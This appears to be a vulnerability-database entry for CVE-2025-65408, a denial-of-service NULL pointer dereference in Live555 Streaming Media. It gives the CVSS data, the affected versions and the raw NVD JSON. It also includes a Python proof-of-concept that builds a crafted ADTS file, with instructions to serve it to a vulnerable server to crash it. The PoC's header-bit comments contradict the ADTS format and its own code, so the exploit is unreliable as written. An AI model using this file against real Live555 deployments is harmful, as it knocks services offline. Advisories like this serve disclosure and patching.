Security Vulnerability Report
CVE-2025-65408 CVSS 6.5 MEDIUM

CVE-2025-65408

Published: 2025-12-01 17:15:50
Last Modified: 2025-12-23 13:43:12

Description

A NULL pointer dereference in the ADTSAudioFileServerMediaSubsession::createNewRTPSink() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS file.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:* - VULNERABLE
Live555 Streaming Media v2018.09.02 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-65408 PoC - Live555 NULL Pointer Dereference in ADTSAudioFileServerMediaSubsession

This PoC generates a crafted ADTS file that triggers NULL pointer dereference
in createNewRTPSink() function, causing denial of service.
"""

import struct
import sys


def create_crafted_adts_file(filename, corrupt_frame=False):
    """
    Generate a crafted ADTS file to trigger CVE-2025-65408

    ADTS Header Structure (7 bytes):
    - Sync word: 12 bits (0xFFF)
    - MPEG-4 LC: 1 bit (0)
    - Layer: 2 bits (00)
    - Protection absent: 1 bit (1 = no CRC)
    - Profile: 2 bits
    - Sampling frequency index: 4 bits
    - Private bit: 1 bit
    - Channel configuration: 3 bits
    - Original/Copy: 1 bit
    - Home: 1 bit
    - Copyright identification bit: 1 bit
    - Copyright identification start: 1 bit
    - Frame length: 13 bits
    - Adts buffer fullness: 11 bits
    - Number of AAC frames: 2 bits
    """
    adts_header = bytearray()

    # Sync word (0xFFF) + MPEG-4 LC + Layer + Protection absent
    # First 2 bytes: 0xFFF0 (1111 1111 1111 0000)
    # 0xFFF = sync word, 0x0 = MPEG-4 LC (1 bit) + Layer (2 bits) + Protection absent = 1
    if corrupt_frame:
        # Corrupt frame to trigger NULL pointer dereference
        adts_header.append(0xFF)
        adts_header.append(0xF0)  # Invalid config
    else:
        adts_header.append(0xFF)
        adts_header.append(0xF1)  # Valid sync + MPEG-4 LC LC + no CRC

    # Profile (2 bits) + Sampling frequency index (4 bits) + Private (1 bit)
    # Using AAC LC profile (00) and 44100 Hz sampling (4 = 0x04)
    profile_and_samp = (0x00 << 6) | (0x04 << 2) | 0x00
    adts_header.append(profile_and_samp)

    # Channel configuration (2 bits) + Original/Copy + Home + Copyright bits
    channel_config = (0x02 << 6) | (0 << 2) | (0 << 1) | 0
    adts_header.append(channel_config)

    # Copyright identification + Frame length high (5 bits)
    frame_length_high = 0x00
    adts_header.append(frame_length_high)

    # Frame length low (8 bits) - total frame length including header
    frame_length_low = 0x15  # Minimal frame length
    adts_header.append(frame_length_low)

    # ADTS buffer fullness (11 bits) + Number of AAC frames (2 bits)
    buffer_fullness = 0x7FF  # Variable bit rate
    aac_frames = 1
    adts_footer = (buffer_fullness << 6) | aac_frames
    adts_header.append((adts_footer >> 8) & 0xFF)
    adts_header.append(adts_footer & 0xFF)

    # Add minimal frame data to make file parseable
    frame_data = b'\x00' * 200

    # Write crafted ADTS file
    with open(filename, 'wb') as f:
        f.write(adts_header)
        f.write(frame_data)

    print(f"[+] Crafted ADTS file created: {filename}")
    print(f"[+] File size: {len(adts_header) + len(frame_data)} bytes")
    return filename


def main():
    print("=" * 60)
    print("CVE-2025-65408 PoC - Live555 NULL Pointer Dereference")
    print("=" * 60)

    filename = "crafted_cve_2025_65408.adts"
    create_crafted_adts_file(filename, corrupt_frame=True)

    print("\n[*] Usage: Serve this file via vulnerable Live555 server")
    print("[*] Or open with media player that uses Live555 library")
    print("[*] Expected result: Server crash with NULL pointer dereference")


if __name__ == "__main__":
    main()

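References

https://github.com/rgaufman/live555 (Product)
https://shimo.im/docs/VMAPLVLp57SJ92Ag (Exploit, Third Party Advisory)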

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65408", "sourceIdentifier": "[email protected]", "published": "2025-12-01T17:15:50.407", "lastModified": "2025-12-23T13:43:11.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL pointer dereference in the ADTSAudioFileServerMediaSubsession::createNewRTPSink() function of Live555 Streaming Media v2018.09.02 allows attackers to cause a Denial of Service (DoS) via supplying a crafted ADTS file."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:live555:streaming_media:2018-09-02:*:*:*:*:*:*:*", "matchCriteriaId": "C9F01989-4E5A-42B7-8EF7-74E3A5335754"}]}]}], "references": [{"url": "https://github.com/rgaufman/live555", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://shimo.im/docs/VMAPLVLp57SJ92Ag", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}